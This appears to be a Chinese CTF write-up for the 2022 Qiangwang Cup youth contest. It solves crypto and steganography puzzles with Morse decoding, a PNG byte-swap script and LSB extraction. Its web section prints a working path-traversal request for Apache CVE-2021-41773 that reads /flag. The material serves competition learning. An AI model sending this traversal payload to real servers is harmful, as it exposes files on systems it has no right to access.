强网杯青少年专项赛 2022 Writeup
3 min read
这次失了大策,web拉胯了
Crypto
crypto1
没有规则的乱文,该怎么进行分析呢?
下载一堆AB
字符串,试了一下培根不行,然后试了一下摩斯电码,得到一堆英文
我们直接 quipqiup
跑一下得到 flag
Misc
misc1
你知道万能和弦是什么吗?
下载附件里面是一个 png 图片,但是打开提示文件损坏,使用记事本打开发现是base64格式的图片。
使用 CyberChef
解码了一下发现16进制数据顺序颠倒了,正常数据头应该为 89 50 4e 47
,也就是奇数位和偶数位互换了
撸个脚本转换一下
import base64
import binascii
listData = []
newData = ''
with open('chuyinweilai.png', 'rb') as f:
data = str(binascii.hexlify(base64.b64decode(f.read())), encoding='utf-8')
for i in range(0, len(data), 2):
listData.append(data[i:i+2])
for j in range(0, len(listData), 2):
newData += str(listData[j+1] + listData[j])
with open('flag.png', 'wb') as f:
f.write(binascii.unhexlify(newData))
得到图片
直接 lsb
解密即可,密码根据题目描述百度搜索万能和旋得到 4536251
python2 lsb.py extract flag.png flag.txt 4536251
misc3
隐写术是一门关于信息隐藏的技巧与科学,隐写的信息看起来像一些其他的东西,隐写不同于加密,加密是一段你看不懂的东西,隐写是一段你似乎能看懂的东西。现在,这里用了一种最简单的隐写方式隐藏了一些信息,你能找到它么?
下载附件,在数据尾发现一个密码 7his_1s_p4s5w0rd
,解压文件得到 FindHideMsg.png
分离 FindHideMsg.png
文件后得到新图 secret.png
同时多出来一部分(我圈出来的地方)
既然是 lsb
隐写,我们直接用脚本解密
python2 lsb.py extract secret.png flag.txt 7his_1s_p4s5w0rd
Web
Web1
存在CVE-2021-41773,你能得到flag吗?
没啥好说的,签到题
/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag